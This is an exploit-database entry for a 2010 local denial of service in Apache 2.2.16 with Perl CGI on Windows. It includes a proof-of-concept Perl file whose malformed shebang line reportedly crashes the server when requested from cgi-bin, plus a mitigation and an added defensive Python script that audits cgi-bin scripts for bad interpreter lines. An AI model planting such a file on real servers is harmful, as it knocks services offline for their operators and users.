Vendor: Apache
By: FB1H2S
CVSS: 7.5 HIGH
Denial of Service
CWE: 400
Product Name: Apache
Affected Version From: 2.2.16
Affected Version To: 2.2.16
Patch Exists: No
Related CWE: N/A
CPE: 2.2.16
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

Apache 2.2 local denial of service windows

A local denial of service vulnerability exists in Apache 2.2.16 on Windows XP. The bug affects only Apache with Perl on Windows. To exploit it, an attacker must save a malicious .pl file in the Apache cgi-bin directory and request it from a browser. Apache then crashes and, if configured, throws a debug prompt.

Mitigation:

Disable the Perl CGI module in Apache, or upgrade to a version of Apache that is not affected by this vulnerability.

Exploit-DB raw data:

#!c:\\perl\\bin\\
#
##
# Exploit Title: Apache 2.2 local denial of service windows
# Date: 25/10/2010
# Author: FB1H2S
# Software Link: http://httpd.apache.org/.
# Version: APACHE 2.2.16
# Tested on: Windows XP Service Pack 3
# CVE :
##
## Save the file as .pl in apache cgi-bin and call this file from your browser and apache will
## crash throwing a debug prompt if configured.
## Apache by default is configured with perl and crash occurs when a perl cgi module tries to
## execute, calling the perl cgi binary from the "c:\\ path" which is an invalid location.
## Apache by default restarts automatically on every crash. Tested on Apache 2.2.16 on windows xp.
## This bug only affects (Apache + perl) on windows.
##
############################################################################################
#And all greets to Garage Hackers Members.
#http://www.garage4hackers.com/forum.php  an Information Security portal
#And shouts to ICW, Andhra Hackers members
#B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r5scal,Atul,Vinnu
#############################################################################################
##
##
##
##
##
##
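
The exploit comments above attribute the crash to a script whose first line names an invalid interpreter location. The following audit for a cgi-bin directory is an added example, not part of the original exploit entry or of Apache; the function names and sample lines are hypothetical, and it assumes Apache takes the interpreter from the script's `#!` line.

```python
import os
import sys

def parse_shebang(first_line):
    """Return the interpreter path from a '#!' line, '' if empty, None if absent."""
    line = first_line.lstrip("\ufeff").rstrip("\r\n")
    if not line.startswith("#!"):
        return None
    rest = line[2:].strip()
    if rest.startswith('"'):
        # Quoted interpreter path that may contain spaces, followed by options.
        return rest[1:].split('"', 1)[0]
    return rest.split()[0] if rest else ""

def classify(first_line, is_file=os.path.isfile):
    """Classify a script's first line; is_file is injectable for offline testing."""
    interp = parse_shebang(first_line)
    if interp is None:
        return "no-shebang"
    if interp == "":
        return "empty-interpreter"
    if interp.endswith(("\\", "/")):
        # Trailing separator: a directory, not a binary, as in the page's shebang.
        return "interpreter-is-directory"
    if not is_file(interp):
        return "interpreter-missing"
    return "ok"

def audit_cgi_dir(cgi_dir, is_file=os.path.isfile):
    """Walk cgi_dir and return (path, verdict) for scripts with a bad '#!' line."""
    findings = []
    for root, _dirs, files in os.walk(cgi_dir):
        for name in sorted(files):
            path = os.path.join(root, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                verdict = classify(fh.readline(), is_file)
            if verdict not in ("ok", "no-shebang"):
                findings.append((path, verdict))
    return findings

# Constructed sample first lines; the first is modelled on the shebang on this page.
SAMPLES = ["#!c:\\perl\\bin\\\n", "#!C:/Perl/bin/perl.exe -T\n", "print 1;\n"]

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, verdict in audit_cgi_dir(sys.argv[1]):
            print(f"{verdict}\t{path}")
    else:
        for s in SAMPLES:
            print(repr(s), "->", classify(s))
```

Run it with the cgi-bin path as the only argument on the server itself, so that the interpreter existence check reflects that host's filesystem.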